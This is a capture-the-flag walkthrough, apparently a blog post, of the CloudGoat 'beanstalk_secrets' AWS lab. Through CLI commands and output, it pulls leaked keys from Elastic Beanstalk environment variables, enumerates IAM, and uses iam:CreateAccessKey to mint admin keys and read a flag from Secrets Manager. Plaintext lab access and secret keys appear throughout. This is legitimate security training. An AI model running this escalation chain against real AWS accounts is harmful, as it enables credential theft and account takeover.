Beanstalk Secrets
Automatically whitelists your IP to allow access to the vulnerable CloudGoat scenario.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# cloudgoat config whitelist --auto
initial_low_priv_credentials = Access Key: AKIAZI2LCSHNOWPG26FR
Secret Key: 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
Confirms current AWS identity (low-priv user: cgidrddh9uxljn_low_priv_user).
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws sts get-caller-identity --profile pw
{
"UserId": "AIDAZI2LCSHNL62NPKJBK",
"Account": "637423227354",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_low_priv_user"
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws help
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk help
Retrieves environment ID and endpoint URL for the active Beanstalk application.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-environments --profile pw
{
{
"Environments": [
{
"EnvironmentName": "cgidrddh9uxljn-env",
"EnvironmentId": "e-nphm6qpyc2",
"ApplicationName": "cgidrddh9uxljn-app",
"SolutionStackName": "64bit Amazon Linux 2023 v4.6.0 running Python 3.11",
"PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.11 running on 64bit Amazon Linux 2023/4.6.0",
"EndpointURL": "awseb-e-n-AWSEBLoa-114Z7VERU1JC9-508425660.us-east-1.elb.amazonaws.com",
"CNAME": "cgidrddh9uxljn-env.eba-ypbpr8em.us-east-1.elasticbeanstalk.com",
"DateCreated": "2025-07-06T07:58:12.268000+00:00",
"DateUpdated": "2025-07-06T08:01:26.202000+00:00",
"Status": "Ready",
"AbortableOperationInProgress": false,
"Health": "Grey",
"HealthStatus": "Pending",
"Tier": {
"Name": "WebServer",
"Type": "Standard",
"Version": "1.0"
},
"EnvironmentLinks": [],
"EnvironmentArn": "arn:aws:elasticbeanstalk:us-east-1:637423227354:environment/cgidrddh9uxljn-app/cgidrddh9uxljn-env"
}
]
}
Retrieves the name and metadata of the Beanstalk application.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-applications --profile pw
{
"Applications": [
{
"ApplicationArn": "arn:aws:elasticbeanstalk:us-east-1:637423227354:application/cgidrddh9uxljn-app",
"ApplicationName": "cgidrddh9uxljn-app",
"Description": "Elastic Beanstalk application for insecure secrets scenario",
"DateCreated": "2025-07-06T07:57:55.841000+00:00",
"DateUpdated": "2025-07-06T07:57:55.841000+00:00",
"ConfigurationTemplates": [],
"ResourceLifecycleConfig": {
"VersionLifecycleConfig": {
"MaxCountRule": {
"Enabled": false,
"MaxCount": 200,
"DeleteSourceFromS3": false
},
"MaxAgeRule": {
"Enabled": false,
"MaxAgeInDays": 180,
"DeleteSourceFromS3": false
}
}
}
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-application-versions --application-name cgidrddh9uxljn-app --version-label "v1" --profile pw
{
"ApplicationVersions": []
}
Leaks environment variables including exposed AWS credentials for a higher-privileged user.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-configuration-settings --environment-name cgidrddh9uxljn-env --application-name cgidrddh9uxljn-app --profile pw | jq '.ConfigurationSettings[0].OptionSettings[] | select(.Namespace=="aws:elasticbeanstalk:application:environment")'
{
"Namespace": "aws:elasticbeanstalk:application:environment",
"OptionName": "PYTHONPATH",
"Value": "/var/app/venv/staging-LQM1lest/bin"
}
{
"Namespace": "aws:elasticbeanstalk:application:environment",
"OptionName": "SECONDARY_ACCESS_KEY",
"Value": "AKIAZI2LCSHND4ONUGEM"
}
{
"Namespace": "aws:elasticbeanstalk:application:environment",
"OptionName": "SECONDARY_SECRET_KEY",
"Value": "pSGrnRE8rRMWqoKWdeB0OHd/BPL+0T+eC8zwQlWJ"
}
now using these credentials enumerate IAM permissions to eventually create an access key for an administrator user
Personal Script
use my own script to do the IAM enumeration
{
"current_user": "cgidrddh9uxljn_secondary_user",
"users": [
"cgidrddh9uxljn_secondary_user"
],
"managed_policies": {
"cgidrddh9uxljn_secondary_user": [
{
"PolicyName": "cgidrddh9uxljn_secondary_policy",
"PolicyArn": "arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy"
}
]
},
"inline_policies": {
"cgidrddh9uxljn_secondary_user": []
},
"groups_managed_policies": {
"Admin": []
},
"groups_inline_policies": {
"Admin": []
},
"users_groups": {},
"roles": {
"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah": {
"RoleId": "AROAZI2LCSHNHAYBZ7NB6",
"Arn": "arn:aws:iam::637423227354:role/cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"AWS": "AIDAZI2LCSHNC6T5WHMCJ"
},
"Action": "sts:AssumeRole"
}
]
}
},
"cgidrddh9uxljn_eb_instance_role": {
"RoleId": "AROAZI2LCSHNFI4A4BNZE",
"Arn": "arn:aws:iam::637423227354:role/cgidrddh9uxljn_eb_instance_role",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
"cgidrddh9uxljn_eb_service_role": {
"RoleId": "AROAZI2LCSHNKBOPAXYCP",
"Arn": "arn:aws:iam::637423227354:role/cgidrddh9uxljn_eb_service_role",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticbeanstalk.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
"rds-monitoring-role": {
"RoleId": "AROAZI2LCSHNCK26BPXQW",
"Arn": "arn:aws:iam::637423227354:role/rds-monitoring-role",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "monitoring.rds.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1": {
"RoleId": "AROAZI2LCSHNEK7B2PR7Y",
"Arn": "arn:aws:iam::637423227354:role/vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
}
},
"attached_role_policies": {
"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah": [],
"cgidrddh9uxljn_eb_instance_role": [],
"cgidrddh9uxljn_eb_service_role": [],
"rds-monitoring-role": [
"arn:aws:iam::aws:policy/service-role/AmazonRDSEnhancedMonitoringRole"
],
"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1": []
},
"inline_role_policies": {
"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah": {},
"cgidrddh9uxljn_eb_instance_role": {},
"cgidrddh9uxljn_eb_service_role": {},
"rds-monitoring-role": {},
"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1": {}
}
}
Managed Policy Versions
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam get-policy \
--policy-arn arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy \
--profile pw
{
"Policy": {
"PolicyName": "cgidrddh9uxljn_secondary_policy",
"PolicyId": "ANPAZI2LCSHNNTIDMXKIF",
"Arn": "arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2025-07-06T07:57:54+00:00",
"UpdateDate": "2025-07-06T07:57:54+00:00",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam get-policy-version --policy-arn arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy --version-id v1 --profile pw
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"iam:ListRoles",
"iam:GetRole",
"iam:ListPolicies",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetPolicyVersion",
"iam:ListUsers",
"iam:GetUser",
"iam:ListGroups",
"iam:GetGroup",
"iam:ListAttachedUserPolicies",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-07-06T07:57:54+00:00"
}
}
Since you already have permissions like iam:CreateAccessKey and have discovered the user cgidrddh9uxljn_admin_user, you can create new credentials (Access Key + Secret) for that user and gain access as them — even without knowing their existing credentials.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam list-users --profile pw
{
"Users": [
{
"Path": "/",
"UserName": "cgidrddh9uxljn_admin_user",
"UserId": "AIDAZI2LCSHNDLS76Y2GZ",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_admin_user",
"CreateDate": "2025-07-06T07:57:54+00:00"
},
{
"Path": "/",
"UserName": "cgidrddh9uxljn_low_priv_user",
"UserId": "AIDAZI2LCSHNL62NPKJBK",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_low_priv_user",
"CreateDate": "2025-07-06T07:57:54+00:00"
},
{
"Path": "/",
"UserName": "cgidrddh9uxljn_secondary_user",
"UserId": "AIDAZI2LCSHNPBONLSC4A",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_secondary_user",
"CreateDate": "2025-07-06T07:57:54+00:00"
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam create-access-key \
--user-name cgidrddh9uxljn_admin_user \
--profile pw
{
"AccessKey": {
"UserName": "cgidrddh9uxljn_admin_user",
"AccessKeyId": "AKIAZI2LCSHNFA6ZBTTK",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2025-07-06T08:46:39+00:00"
}
}
now use these credentials to configure
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws sts get-caller-identity --profile pw
{
"UserId": "AIDAZI2LCSHNDLS76Y2GZ",
"Account": "637423227354",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_admin_user"
}
with these privileges we will retrieve flag stored in secrets manager
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws secretsmanager list-secrets --profile pw
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:637423227354:secret:cgidrddh9uxljn_final_flag-KSYyXA",
"Name": "cgidrddh9uxljn_final_flag",
"LastChangedDate": "2025-07-06T12:57:55.311000+05:00",
"LastAccessedDate": "2025-07-06T05:00:00+05:00",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"SecretVersionsToStages": {
"terraform-20250706075755171300000002": [
"AWSCURRENT"
]
},
"CreatedDate": "2025-07-06T12:57:54.304000+05:00"
}
]
}
Found The Flag
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws secretsmanager get-secret-value \
--secret-id cgidrddh9uxljn_final_flag \
--profile pw
{
"ARN": "arn:aws:secretsmanager:us-east-1:637423227354:secret:cgidrddh9uxljn_final_flag-KSYyXA",
"Name": "cgidrddh9uxljn_final_flag",
"VersionId": "terraform-20250706075755171300000002",
"SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-07-06T12:57:55.307000+05:00"
}
Top comments (0)